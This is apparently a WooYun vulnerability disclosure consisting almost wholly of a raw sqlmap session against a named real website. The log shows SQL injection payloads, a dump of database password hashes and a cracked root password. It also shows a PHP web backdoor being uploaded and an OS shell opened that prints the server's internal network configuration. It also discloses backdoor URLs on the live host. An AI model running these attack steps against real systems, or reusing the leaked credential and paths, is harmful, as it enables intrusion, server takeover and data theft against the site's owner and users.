WooYun.org

./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password
    sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:24:01
[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[14:24:01] [INFO] resuming back-end DBMS 'mysql'
[14:24:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2548 AND 1953=1953
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2548 AND SLEEP(5)
---
[14:24:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:24:02] [INFO] fetching database users password hashes
[14:24:02] [WARNING] reflective value(s) found and filtering out
[14:24:02] [INFO] the SQL query used returns 6 entries
[14:24:02] [INFO] starting 6 threads
[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "pma",""
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "root",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:24:03] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:24:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:24:03] [INFO] starting 4 processes
[14:24:33] [INFO] cracked password 'wise' for user 'root'
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [2]:
    password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520
    clear-text password: wise
    password hash: NULL

[14:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:26:46] [INFO] going to use a web backdoor for command prompt
[14:26:46] [INFO] fingerprinting the back-end DBMS operating system
[14:26:46] [WARNING] reflective value(s) found and filtering out
[14:26:46] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'
[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'
[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique
[14:26:47] [WARNING] unable to upload the file stager on '/'
[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique
[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4
[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique
[14:26:53] [WARNING] unable to upload the file stager on '/wap'
[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique
[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique
[14:27:03] [INFO] heuristics detected web page charset 'utf-8'
[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php
[14:27:06] [INFO] heuristics detected web page charset 'ascii'
[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php
[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] Y
[14:27:17] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
Windows IP 配置
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821
   IPv4 地址 . . . . . . . . . . . . : 10.123.176.75
   子网掩码  . . . . . . . . . . . . : 255.255.255.224
   默认网关. . . . . . . . . . . . . : 10.123.176.67
隧道适配器 本地连接* 4:
   连接特定的 DNS 后缀 . . . . . . . :
   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4
   本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4
   默认网关. . . . . . . . . . . . . : ::
隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :
---